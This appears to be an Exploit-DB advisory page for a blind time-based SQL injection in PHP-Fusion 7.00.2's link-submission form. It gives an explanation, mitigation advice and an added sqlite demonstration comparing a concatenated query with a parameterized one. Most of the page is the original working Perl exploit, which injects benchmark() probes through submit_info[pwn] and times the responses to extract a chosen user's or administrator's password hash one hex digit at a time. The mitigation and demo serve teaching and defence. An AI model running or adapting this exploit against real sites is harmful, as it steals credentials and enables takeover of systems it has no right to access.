Vendor: PHP-Fusion
By: athos
CVSS: 7.5 (HIGH)
CWE-89: SQL Injection
Product Name: PHP-Fusion
Affected Version From: 7.00.2
Affected Version To: 7.00.2
Patch Exists: YES
Related CWE: N/A
CPE: a:php-fusion:php-fusion
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit

This exploit targets a blind SQL injection in PHP-Fusion 7.00.2. User-supplied input reaches a database query in submit.php (the link-submission form, stype=l, via the submit_info[...] parameter) without being escaped, so an attacker who holds a valid account can append SQL of their own. The injection is blind: the page never shows the query's result. Instead, each injected query uses MySQL's benchmark() to stall the response only when a guessed condition is true, and the attacker reads the hidden value by timing the responses. The script below applies this to the <prefix>_users table and recovers a chosen user's password hash (or admin password hash) one hex character at a time, taking roughly up to 16 requests per character and 32 characters per MD5 hash. As the author notes, the target must have magic_quotes_gpc off and register_globals on.

Mitigation:

Upgrade to a PHP-Fusion release that contains the vendor's fix. More generally, never build SQL by concatenating user input into the query string: use parameterized (prepared) statements, so that input can only ever be a value and never change the structure of the statement, and validate input against what the field is expected to hold. Disabling register_globals also removes a precondition this exploit relies on, but magic_quotes_gpc and similar escaping tricks are not a fix on their own.
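To make the inference concrete, here is an added worked example that is not part of the original advisory or of the exploit above. It reproduces the exploit's character-by-character loop offline against an in-memory sqlite3 database with constructed data: a hypothetical link lookup that concatenates user input into SQL (standing in for the vulnerable submit.php query, whose exact text is not on this page), the same probe shape as give_char() translated to sqlite's dialect, and the parameterized version of the lookup that the mitigation calls for. Because sqlite has no benchmark(), the signal is a row being returned rather than a delay; the extraction logic is otherwise the one the exploit uses. Table and column names follow the PHP-Fusion conventions the exploit relies on; everything else (the link table, the sample users, the hashes) is assumed for illustration.

```python
"""Added example (not PHP-Fusion's code and not the exploit author's): the inference
loop of a blind SQL injection, run offline against sqlite3, beside the parameterized
query that stops it."""
import hashlib
import sqlite3

# --- constructed sample data (assumptions, not taken from the page) -----------------
PREFIX = "fusion"                                 # table prefix, as in the exploit's usage
TARGET_ID = 1                                     # user whose hash the attacker reads
TARGET_HASH = hashlib.md5(b"p4ssw0rd").hexdigest()   # PHP-Fusion 7 stored MD5 hex digests
ADMIN_HASH = hashlib.md5(b"adminpw").hexdigest()
HEX_CODES = list(range(48, 58)) + list(range(97, 103))   # '0'-'9', 'a'-'f': the exploit's @chars


def build_db():
    """In-memory stand-in for the PHP-Fusion database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}_users (user_id INTEGER, user_name TEXT, "
                 "user_password TEXT, user_admin_password TEXT)")
    conn.execute(f"INSERT INTO {PREFIX}_users VALUES (?, ?, ?, ?)",
                 (TARGET_ID, "admin", TARGET_HASH, ADMIN_HASH))
    conn.execute(f"CREATE TABLE {PREFIX}_links (link_name TEXT, link_cat TEXT)")
    conn.execute(f"INSERT INTO {PREFIX}_links VALUES (?, ?)", ("Home", "1"))
    return conn


def vulnerable_lookup(conn, user_value):
    """The bug pattern: attacker text concatenated into SQL (hypothetical query)."""
    sql = f"SELECT link_name FROM {PREFIX}_links WHERE link_cat = '{user_value}'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, user_value):
    """Same lookup with a bound parameter: the value cannot alter the statement."""
    sql = f"SELECT link_name FROM {PREFIX}_links WHERE link_cat = ?"
    return conn.execute(sql, (user_value,)).fetchall()


def payload(field, pos, code):
    """One probe shaped like the exploit's give_char(): close the string literal, OR in
    a subquery that yields 1 only when the tested character matches, comment out the
    rest.  sqlite dialect: unicode() for MySQL ascii(), CASE for if(), '-- ' for '#'."""
    return (f"' OR (SELECT CASE WHEN unicode(substr({field}, {pos}, 1)) = {code} "
            f"THEN 1 ELSE 0 END FROM {PREFIX}_users WHERE user_id = {TARGET_ID}) -- ")


def extract(oracle, field="user_password", length=32):
    """Recover a hex digest one character at a time from a true/false oracle.
    The exploit's oracle is 'did benchmark() make the response slow'; here it is
    'did the query return a row'.  The search itself is identical."""
    recovered = ""
    for pos in range(1, length + 1):
        for code in HEX_CODES:
            if oracle(payload(field, pos, code)):
                recovered += chr(code)
                break
        else:
            return None          # no candidate matched: the injection did not fire
    return recovered


def attack_vulnerable(field="user_password"):
    conn = build_db()
    return extract(lambda p: bool(vulnerable_lookup(conn, p)), field)


def attack_hardened(field="user_password"):
    conn = build_db()
    return extract(lambda p: bool(hardened_lookup(conn, p)), field)


if __name__ == "__main__":
    print("vulnerable lookup leaks:", attack_vulnerable())
    print("hardened lookup leaks:  ", attack_hardened())
```

Against the concatenated query the loop recovers the full 32-character hash in at most 32 x 16 probes; against the parameterized query the same payloads are just an unmatched category string, the oracle never fires, and extract() gives up at the first position. On a real MySQL target the only difference is the signal: the exploit compares elapsed seconds against a threshold instead of inspecting the response body, which is what makes it "blind".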

Exploit-DB raw data:

#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off && register globals on
#       don't add me on msn messenger
#       my email staker.38@gmail.com
#
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D
# -------------------------------------------------------
# This is practically the same vulnerability as in the
# 6.01.14 version (http://milw0rm.com/exploits/5470) found
# by The:Paradox. PHP-Fusion's coder seems not interested
# in Web Security, isn't he?
# -------------------------------------------------------
# User Password:  my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";
# -------------------------------------------------------

use strict;
use Digest::MD5 ('md5_hex');
use LWP::UserAgent;

# Column of <prefix>_users to read, one hex digit at a time.
my $field = "user_password";

# Arguments: target host/path, table prefix, credentials of a
# valid account (used to build the fusion_user cookie) and the
# user_id whose hash is extracted.
my $domain = shift;
my $ptable = shift;
my $ulogin = shift;
my $plogin = shift;
my $userid = shift or &usage;

# Candidate bytes: '0'..'9' and 'a'..'f', the MD5 hex alphabet.
my @chars  = (48..57, 97..102);
my $substr = 1;                      # current 1-based position in the hash
my $http   = LWP::UserAgent->new;

# POST one injected value to submit.php (link submission form).
# The injection point is the value of submit_info[pwn]; the
# fusion_user cookie is "<user_id>.<md5(password)>".
sub send_request
{
     my $param = shift @_ or die "missing payload";
     my $host  = $domain . "/submit.php?stype=l";

     $http->default_header('Cookie' => "fusion_user=${ulogin}." . md5_hex($plogin));
     return $http->post('http://' . $host, [
                                 'link_category'    => 1,
                                 'link_name'        => 1,
                                 'link_url'         => 1,
                                 'link_description' => 1,
                                 'submit_link'      => 'Submit+Link',
                                 'submit_info[pwn]' => $param,
                               ]);
}

# Build the time-based probe: when the byte at position $uidz of
# $field equals $charz, benchmark() stalls MySQL; otherwise the
# query returns at once.  '#' comments out the rest of the query.
sub give_char
{
     my ($charz,$uidz) = @_;

     my $send = "' or (select if((ascii(substring".
                "($field,$uidz,1))=$charz),".
                "benchmark(230000000,char(0)),".
                "0) from ${ptable}_users where user_id=$userid))#";

     return $send;
}

# 32 hex digits of an MD5 hash.  A response slower than 6 seconds
# means the guessed digit is right: print it and advance.  If no
# candidate exceeds the threshold (slow target, badly tuned
# benchmark count) the same position is probed again on the next
# iteration, so the output can come out shorter than 32 characters.
for (1..32)
{
     foreach my $set (@chars)
     {
          my $start = time();

          send_request(give_char($set,$substr));

          my $stop = time();

          if ($stop - $start > 6)
          {
               syswrite(STDOUT, chr($set));
               $substr++;
               last;
          }
     }
}
print "\n";

sub usage
{
      print "PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit\n";
      print "by athos - staker[at]hotmail[dot]it\n";
      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n";
      exit;
}

# milw0rm.com [2008-12-24]